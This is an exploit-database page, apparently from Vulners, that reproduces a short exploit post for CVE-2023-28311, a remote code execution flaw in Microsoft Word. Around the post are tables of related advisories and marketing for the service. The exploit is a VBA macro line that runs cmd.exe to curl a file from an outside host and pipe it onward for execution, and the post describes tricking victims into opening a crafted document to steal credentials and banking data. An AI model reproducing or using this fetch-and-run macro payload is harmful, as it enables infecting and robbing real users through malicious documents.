Vulners
Lucene search
Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Microsoft Word 16.72.23040900 - Remote Code Execution Vulnerability | 20 Apr 202300:00 | – | zdt |
 | Microsoft Patch Tuesday April 2023: CLFS EoP, Word RCE, MSMQ QueueJumper RCE, PCL6, DNS, DHCP | 27 Apr 202322:03 | – | avleonov |
 | CVE-2023-28311 | 11 Apr 202320:59 | – | circl |
 | Microsoft Word 安全漏洞 | 11 Apr 202300:00 | – | cnnvd |
 | Microsoft Word Code Execution Vulnerability (CNVD-2025-17485) | 13 Apr 202300:00 | – | cnvd |
 | CVE-2023-28311 | 11 Apr 202319:14 | – | cve |
 | CVE-2023-28311 Microsoft Word Remote Code Execution Vulnerability | 11 Apr 202319:14 | – | cvelist |
 | EUVD-2023-32018 | 3 Oct 202520:07 | – | euvd |
 | KLA48823 Multiple vulnerabilities in Microsoft Office | 11 Apr 202300:00 | – | kaspersky |
 | Security Updates for Microsoft Office Products (Apr 2023) (macOS) | 12 Apr 202300:00 | – | nessus |
10
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2023 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.8
EPSS0.08353
SSVC